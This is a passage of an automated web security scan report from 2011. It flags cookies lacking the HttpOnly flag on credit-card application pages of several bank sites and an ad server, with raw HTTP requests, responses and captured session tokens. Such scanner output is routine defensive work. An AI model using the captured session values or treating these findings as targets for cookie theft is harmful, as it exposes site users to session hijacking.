Cookie: LivePersonID=LP i=16601155425835,d=1302186497; HumanClickACTIVE=1308227924895

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2124
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSARDTDCT=JHCIMLECCHIIGDFOEGCGBDHM; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 32528459
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(ho
...[SNIP]...

10.6. https://www.applyonlinenow.com/USCCapp/Ctl/display previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.applyonlinenow.com
Path:	/USCCapp/Ctl/display

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0000M0rR0J2Y8xxLnoLQet1F3rI:-1; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.7. https://www.applyonlinenow.com/USCCapp/Ctl/entry previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.applyonlinenow.com
Path:	/USCCapp/Ctl/entry

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0000AcsFbEU7BtYedf8xPa1--z8:-1; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.8. https://www.applyonlinenow.com/USCCapp/Ctl/validate previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.applyonlinenow.com
Path:	/USCCapp/Ctl/validate

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0000txUoQLMgfpEEZGH4aujROUY:-1; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.9. http://www.capitalone.com/smallbusiness/cards/venture-for-business/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.capitalone.com
Path:	/smallbusiness/cards/venture-for-business/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WWWJSESSIONID=QfmGN7BTg0PVLQh9shh7J4wx98JVymDjjJ517tMnYMVD5qnrzfQv!512190221!1391065199; domain=.capitalone.com; path=/; secure
Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; domain=.capitalone.com; expires=Monday, 14-Jun-2021 11:59:10 GMT; path=/
SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251 HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105561&pg=17&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA; BIGipServerpl_capitalone.com_80=828974346.29215.0000; external_id=GAN_ZZ10700001_USCGAN_j26689465k112308_631528059; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=

Response

10.10. https://www.citicards.com/cards/acq/Apply.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.citicards.com
Path:	/cards/acq/Apply.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000LN-SZdCBn1IHp2JZMK_jEdN:gtcardsrmi10crd; Path=/; Secure
HSID4T3ZJ3000=3Ez3d13Y1PV2PydTp3fmBP; Path=/; Domain=www.citicards.com; Secure
Channel=CONSUMER_UNSOL; Path=/; Domain=www.citicards.com; Secure
ProspectID=36CEB96C744948E481109575676DCE63; Path=/; Domain=www.citicards.com; Secure
ACQHSIDKEY=HSID4T3ZJ3000; Path=/; Domain=www.citicards.com; Secure

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /cards/acq/Apply.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529047&ProspectID=36CEB96C744948E481109575676DCE63 HTTP/1.1
Host: www.citicards.com
Connection: keep-alive
Referer: https://online.citibank.com/US/JRS/portal/prefillApps.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529047&ProspectID=36CEB96C744948E481109575676DCE63
Content-Length: 0
Cache-Control: max-age=0
Origin: https://online.citibank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HSID4T3VJ3000=kTjaTGnJbsaejkJUEjjpcU; VISITOR=1308312791632; HSID4T3ZJ3000=kffdVRWEuNJx2hojRrLECb; siteId=CB; Channel=CONSUMER_UNSOL; LangId=EN; DecisionMethod=02; ProspectID=36CEB96C744948E481109575676DCE63; CARDS_LOCALE=en; ACQHSIDKEY=HSID4T3VJ3000; JSESSIONID=0000nDeneI9o8pv-LTRpzUZaZtt:gtcardsrmi10crd; s_pers=%20gpv_p7%3D2011_March_ExternlAffiliates_PlatSelect_MC_21monthBTP%7C1308314699502%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: ""
Date: Fri, 17 Jun 2011 12:16:58 GMT
Content-type: text/html; charset=ISO-8859-1
X-ua-compatible: IE=EmulateIE7
X-ua-compatible: IE=EmulateIE7
Cache-control: no-cache
Pragma: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: private
Cache-control: no-store
Cache-control: max-stale=0
Cache-control: must-revalidate
Cache-control: max-age=0
Cache-control: proxy-revalidate
Cache-control: s-max-age=0
Content-language: en-US
Set-cookie: JSESSIONID=0000LN-SZdCBn1IHp2JZMK_jEdN:gtcardsrmi10crd; Path=/; Secure
Set-cookie: CARDS_LOCALE=en; Path=/
Set-cookie: HSID4T3ZJ3000=3Ez3d13Y1PV2PydTp3fmBP; Path=/; Domain=www.citicards.com; Secure
Set-cookie: siteId=CB; Path=/; Domain=.citicards.com; Secure
Set-cookie: Channel=CONSUMER_UNSOL; Path=/; Domain=www.citicards.com; Secure
Set-cookie: LangId=EN; Path=/; Domain=www.citicards.com; Secure
Set-cookie: DecisionMethod=02; Path=/; Domain=www.citicards.com; Secure
Set-cookie: ProspectID=36CEB96C744948E481109575676DCE63; Path=/; Domain=www.citicards.com; Secure
Set-cookie: ACQHSIDKEY=HSID4T3ZJ3000; Path=/; Domain=www.citicards.com; Secure
Vary: accept-encoding
Content-Length: 88403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

...[SNIP]...

10.11. https://www.citicards.com/cards/acq/Apply.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.citicards.com
Path:	/cards/acq/Apply.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000Ho6b9ssBtDTaeSkMcYAOnV3:gtcardsrmi10crd; Path=/; Secure
HSID4DNZJ3000=vRlUqdovLuymEWEwEeCpjj; Path=/; Domain=www.citicards.com; Secure
Channel=CONSUMER_UNSOL; Path=/; Domain=www.citicards.com; Secure
ProspectID=C626E9F2656E4606A21348462D13F6BA; Path=/; Domain=www.citicards.com; Secure
ACQHSIDKEY=HSID4DNZJ3000; Path=/; Domain=www.citicards.com; Secure

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /cards/acq/Apply.do?app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA HTTP/1.1
Host: www.citicards.com
Connection: keep-alive
Referer: https://online.citibank.com/US/JRS/portal/prefillApps.do?app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA
Content-Length: 0
Cache-Control: max-age=0
Origin: https://online.citibank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HSID4T3VJ3000=kTjaTGnJbsaejkJUEjjpcU; VISITOR=1308312791632; CARDS_LOCALE=en; HSID4T3ZJ3000=vqPrL3WjoMdXwjrs5f4CZU; siteId=CB; Channel=CONSUMER_UNSOL; LangId=EN; DecisionMethod=02; ProspectID=36CEB96C744948E481109575676DCE63; ACQHSIDKEY=HSID4T3ZJ3000; JSESSIONID=0000nDeneI9o8pv-LTRpzUZaZtt:gtcardsrmi10crd; s_pers=%20gpv_p7%3D2011_March_ExternlAffiliates_DiamondPreferred_MC_21monthBTP%7C1308314709677%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: ""
Date: Fri, 17 Jun 2011 12:17:18 GMT
Content-type: text/html; charset=ISO-8859-1
X-ua-compatible: IE=EmulateIE7
X-ua-compatible: IE=EmulateIE7
Cache-control: no-cache
Pragma: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: private
Cache-control: no-store
Cache-control: max-stale=0
Cache-control: must-revalidate
Cache-control: max-age=0
Cache-control: proxy-revalidate
Cache-control: s-max-age=0
Content-language: en-US
Set-cookie: JSESSIONID=0000Ho6b9ssBtDTaeSkMcYAOnV3:gtcardsrmi10crd; Path=/; Secure
Set-cookie: CARDS_LOCALE=en; Path=/
Set-cookie: HSID4DNZJ3000=vRlUqdovLuymEWEwEeCpjj; Path=/; Domain=www.citicards.com; Secure
Set-cookie: siteId=CB; Path=/; Domain=.citicards.com; Secure
Set-cookie: Channel=CONSUMER_UNSOL; Path=/; Domain=www.citicards.com; Secure
Set-cookie: LangId=EN; Path=/; Domain=www.citicards.com; Secure
Set-cookie: DecisionMethod=02; Path=/; Domain=www.citicards.com; Secure
Set-cookie: ProspectID=C626E9F2656E4606A21348462D13F6BA; Path=/; Domain=www.citicards.com; Secure
Set-cookie: ACQHSIDKEY=HSID4DNZJ3000; Path=/; Domain=www.citicards.com; Secure
Vary: accept-encoding
Content-Length: 88320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

...[SNIP]...

10.12. https://www.citicards.com/cards/acq/displayECM.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.citicards.com
Path:	/cards/acq/displayECM.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000fNcTBpmEK6E4ec12wszbhSM:gtcardsrmi10crd; Path=/; Secure
ACQHSIDKEY=HSID4T3VJ3000; Path=/; Domain=www.citicards.com; Secure

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cards/acq/displayECM.do?screenID=3000&flow=web&siteId=CB&sc=4T3VJTP13CJ5MDQ94VW&B=M&app=UNSOL&m=3CJ5MDQ94VW&langId=EN&locale=en_US&ECM_SHORTCUT=Y HTTP/1.1
Host: www.citicards.com
Connection: keep-alive
Referer: https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HSID4T3VJ3000=kTjaTGnJbsaejkJUEjjpcU; VISITOR=1308312791632; CARDS_LOCALE=en; HSID4T3ZJ3000=kffdVRWEuNJx2hojRrLECb; siteId=CB; Channel=CONSUMER_UNSOL; LangId=EN; DecisionMethod=02; ProspectID=36CEB96C744948E481109575676DCE63; JSESSIONID=0000nDeneI9o8pv-LTRpzUZaZtt:gtcardsrmi10crd; ACQHSIDKEY=HSID4T3ZJ3000; s_pers=%20gpv_p7%3DCitibank%2520Online%2520Consumer%2520Card%2520-%2520Enter%2520Information%7C1308314665510%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: ""
Date: Fri, 17 Jun 2011 12:16:43 GMT
Content-type: text/html; charset=ISO-8859-1
X-ua-compatible: IE=EmulateIE7
X-ua-compatible: IE=EmulateIE7
Cache-control: no-cache
Pragma: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: private
Cache-control: no-store
Cache-control: max-stale=0
Cache-control: must-revalidate
Cache-control: max-age=0
Cache-control: proxy-revalidate
Cache-control: s-max-age=0
Content-language: en-US
Set-cookie: JSESSIONID=0000fNcTBpmEK6E4ec12wszbhSM:gtcardsrmi10crd; Path=/; Secure
Set-cookie: CARDS_LOCALE=en; Path=/
Set-cookie: ACQHSIDKEY=HSID4T3VJ3000; Path=/; Domain=www.citicards.com; Secure
Vary: accept-encoding
Content-Length: 32304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

...[SNIP]...

10.13. https://www.citicards.com/cards/acq/genericcontent.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.citicards.com
Path:	/cards/acq/genericcontent.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=00000DM5z7hU6H2m2_QDhnareMb:gtcardsrmi10crd; Path=/; Secure
ACQHSIDKEY=HSID4DNZJ3000; Path=/; Domain=www.citicards.com; Secure

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cards/acq/genericcontent.do?content_id=content_onlineservices_popup HTTP/1.1
Host: www.citicards.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HSID4T3VJ3000=kTjaTGnJbsaejkJUEjjpcU; VISITOR=1308312791632; CARDS_LOCALE=en; HSID4T3ZJ3000=kffdVRWEuNJx2hojRrLECb; siteId=CB; Channel=CONSUMER_UNSOL; LangId=EN; DecisionMethod=02; ProspectID=36CEB96C744948E481109575676DCE63; ACQHSIDKEY=HSID4T3ZJ3000; JSESSIONID=0000nDeneI9o8pv-LTRpzUZaZtt:gtcardsrmi10crd; s_pers=%20gpv_p7%3DCitibank%2520Online%2520Consumer%2520Card%2520-%2520Enter%2520Information%7C1308314614821%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3Dcitinaprod%253D%252526pid%25253DCitibank%25252520Online%25252520Consumer%25252520Card%25252520-%25252520Enter%25252520Information%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.citicards.com%2525252Fcards%2525252Facq%2525252Facq%2525252Fimg%2525252Fapply%2525252Fbtn_VerifyApp.gif%252526ot%25253DIMAGE%3B

Response

HTTP/1.1 200 OK
Server: ""
Date: Fri, 17 Jun 2011 12:16:42 GMT
Content-type: text/html; charset=ISO-8859-1
X-ua-compatible: IE=EmulateIE7
X-ua-compatible: IE=EmulateIE7
Cache-control: no-cache
Pragma: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: private
Cache-control: no-store
Cache-control: max-stale=0
Cache-control: must-revalidate
Cache-control: max-age=0
Cache-control: proxy-revalidate
Cache-control: s-max-age=0
Content-language: en-US
Set-cookie: JSESSIONID=00000DM5z7hU6H2m2_QDhnareMb:gtcardsrmi10crd; Path=/; Secure
Set-cookie: ACQHSIDKEY=HSID4DNZJ3000; Path=/; Domain=www.citicards.com; Secure
Vary: accept-encoding
Content-Length: 15495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

...[SNIP]...

10.14. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!%!!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!+=(5yj!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!#=(C+#!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!,=(6NF!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7!!!!!#=(:!J!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!%=(C6j!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#s`D!!!!#=(BU+!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#slj!!!!#=#T_f!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#wUS!!!!,=(6V[!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$/F4!!!!#=(1C-!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; path=/; expires=Sun, 16-Jun-2013 11:58:29 GMT
BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?adv=60652&code=AS6956&t=2&rnd=1298276706 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3DPoints%20Rewards%20Credit%20Cards%2C%20credit%20card%2C%20reward%20credit%20cards%2C%20credit%20card%2C%20Credit%20Cards%2C%20cash%20back&phint=__bk_t%3DPoints%20Rewards%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DPoints%20Rewards%20Credit%20Cards%2C%20credit%20card%2C%20reward%20credit%20cards%2C%20credit%20card%2C%20Credit%20Cards%2C%20cash%20back&limit=4&r=50781410
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
